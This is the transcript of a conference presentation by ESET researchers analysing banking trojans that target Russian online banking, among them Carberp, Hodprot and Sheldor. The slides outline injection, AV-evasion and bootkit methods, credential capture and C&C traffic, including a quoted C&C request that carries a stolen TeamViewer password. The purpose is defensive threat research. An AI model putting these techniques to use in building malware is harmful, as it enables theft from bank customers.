• Save
Modern malware techniques for attacking RBS systems in Russia
Upcoming SlideShare
Loading in...5

Modern malware techniques for attacking RBS systems in Russia






Total Views
Views on SlideShare
Embed Views



26 Embeds 10,565

http://habrahabr.ru 9755
http://amatrosov.blogspot.com 542
http://m.habrahabr.ru 70
http://amatrosov.blogspot.ru 64
http://paper.li 32
http://www.techgig.com 30
http://a0.twimg.com 22
https://twitter.com 8
http://www.rehints.ru 8
http://us-w1.rockmelt.com 7 4
http://readbox.info 3
http://indieweb.ru 3
http://amatrosov.blogspot.fr 3
http://webcache.googleusercontent.com 2
http://translate.googleusercontent.com 2
http://winter.external.vk.antiblock.ru_mute.habrahabr.ru 1
http://feeds.feedburner.com 1
http://telekomza.ru 1
https://translate.googleusercontent.com 1
http://way.gaeproxyhttp.appspot.com 1
http://amatrosov.blogspot.se 1
http://amatrosov.blogspot.de 1
http://www.google.com 1
http://albert.external.vkontakte.obhodilka.ru_73.habrahabr.ru 1
http://xn-- 1



Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

Modern malware techniques for attacking RBS systems in Russia Modern malware techniques for attacking RBS systems in Russia Presentation Transcript

  • Modern malware techniques for attackingRBS systems in RussiaAleksandr MatrosovEugene Rodionov
  • Who we are? Malware researchers at ESET - complex threats analysis - development of cleaning tools - tracking new malware techniques - investigation of cybercrime groups http://www.joineset.com/
  • Agendao Cybercrime trends in RBSo Most prevalent threats and incidents  Win32/Shiz  Win32/Hodprot  Win32/Sheldor  Win32/RDPdoor  Win32/Carberpo Carberp cybercrime group revenue
  • Overview2010/11: years of attacks on Russian banks• number of incidents has more than doubled compared to 2010*Over 92%* of incidents involve banking trojansMalware tailored to Russian banks and paymentsystemsHowever!• Can (and IS) used in other countries as well *research report "The Russian cybercrime market in 2010: status and trends” http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
  • Interesting facts about Russian bank fraud These guys are still free!
  • Evolution of RBS trojanso RBS Trojans 2009-2010: o RBS Trojans 2011:  Win32/Shiz (2009)  Multiple updates  Win32/Carberp  Growing incidents numbers  Win32/Hodprot  ….  Win32/Sheldor  Win32/Carberp with Bootkit  Win32/RDPdoor
  • Cybercrime landscape (2010)
  • Cybercrime landscape (2011)
  • Cybercrime landscape (2011)
  • Win32/Spy.Shiz
  • Win32/Spy.Shiz detection statistics by monthCloud data from Live Grid August 2009 – November 2011
  • Win32/Spy.Shiz detection statistics by countryCloud data from Live Grid
  • Win32/Spy.Shiz: stealing money
  • Win32/Hodprot
  • Win32/Hodprot detection statistics by monthCloud data from Live Grid July 2010 – November 2011
  • Win32/Hodprot detection statistics by countryCloud data from Live Grid
  • Win32/Hodprot: antiforensics Main module Original sfcfiles.dll Kernel - driver image Loader code C&C URLs
  • Win32/Hodprot: injecting payload Winlogon Address Browser Address Space Space Setupapi.dll Assemble Payload Inject Payload Update Payload sfcfiles.dll Payload System Registry User-mode Kernel-mode Inject Payload Install & Load Assemble Payload Driver sfc.sys
  • Win32/Hodprot: C&C protocol Win32/Hodprot C&C Server Send request (bot ID, integer) Reply with updated Handle modules and image to Request execute Update the bot’s modules, run downloaded Send Status exeutable Information
  • Win32/Sheldor & Win32/RDPdoor
  • Win32/Sheldor and TeamViewer in action1. Request cloud ID2. Set cloud ID3. Send ID to C&C TeamViewer4. Malicious connection cloud 1 2 infected 4 computer Win32/Sheldor 3 GET C&C /getinfo.php?id=414%20034%20883&pwd =6655&stat=1
  • Under the hood: DLL hooking TeamViewer.exe TV.dll (proxy DLL) TS.dll (original TS.dll)
  • Malicious DLL call graph
  • Malicious DLL decompilation Functions for calling from original TS.dll Load original TS.dll Hook functions C&C URL
  • Sheldor C&C panel
  • Win32/RDPdoor installation infected Win32/RDPdoorcomputer C&C run dropper and send system information 1 authentication on C&C and provide Thinsoft BeTwin for installation 2 send status information 3
  • Stealing authentication data1. Install GINA extension DLL2. Display fake logon screen3. Capture user name & password4. Send to C&C
  • Win32/Carberp
  • Win32/Carberp detections over time in RussiaCloud data from Live Grid January 2010 – November 2011
  • Win32/Carberp detection statistics by countryCloud data from Live Grid
  • Self-protecting FunctionalityBypassing AV-emulators many calls of rare WinAPI functionsCode injection method ZwQueueApcThread() ZwResumeThread()Unhooking method checking first bytes of API function body and deleting hooksCommand and string encryption custom encryption algorithmBot authentication on C&C file with authentication data stored on infected PCNetwork communication encryption base64( RC2(data) )API function calls obfuscation custom hash algorithmDetection of AV hooks comparison of the first original bytesBypassing static AV signatures appending random junk bytes to dropped filesHiding in the system hooking system functions bootkit infector (September 2011)
  • Carberp going deeper since September 2011
  • Carberp going deeper since September 2011 real mode Load MBR real mode Load VBR real mode/ Load protected mode bootstrap code real mode/ protected mode Load bootmgr Target of Rovnix & Carberp real mode/ Load protected mode winload.exe or winresume.exe Load kernel and boot start drivers
  • Carberp: Infected Partition Layouto Carberp overwrites bootstrap code of the active partitiono The malicious driver is written either:  before active partition, in case there is enough space  in the end of the hard drive, otherwise MBR VBR Bootstrap Code File System Data Before Infecting Compressed After Infecting Data Malicious Malicious Bootstrap MBR VBR File System Data Unsigned Code Code Driver NTFS bootstrap code (15 sectors)
  • Interesting strings and investigation
  • Win32/Carberp: money stealing methodsStealing techniques FunctionalityWeb-injects/Autoloads inserting the specified JS-code into HTML(IE, FF, Chrome, Opera) returned by the online banking siteBackconnect backdoor loading on request special binary module(RDP/VNC) (RDPdoor, custom VNC client)Keylogger (based on WinAPI) recording keyboard events into logfileScreenSpy (based on WinAPI) saving screenshots into logfileGrabbers (Form, FTP, Pass) loading on request special binary moduleCustom plugins for RBS binary modules for specified RBS (sber.plug)
  • Win32/Carberp botnet control panel
  • C&C with stolen data
  • Cab-files with stolen data
  • Stolen data: BS-Client IB system
  • Stolen data: CyberPlat payment system
  • Stolen data: iBank IB system
  • Stolen data: SberBank IB
  • Stolen data: UkrSibBank IB
  • References “Cybercrime in Russia: Trends and issues”http://go.eset.com/us/resources/white-papers/CARO_2011.pdf “Evolution of Win32/Carberp: going deeper”http://blog.eset.com/2011/11/21/evolution-of-win32carberp-going-deeper “Hodprot: Hot to Bot”http://go.eset.com/us/resources/white-papers/Hodprot-Report.pdf Follow ESET Threat Bloghttp://blog.eset.com
  • Questions
  • Thank you for your attention ;) Aleksandr Matrosov matrosov@eset.sk @matrosov Eugene Rodionov rodionov@eset.sk @vxradius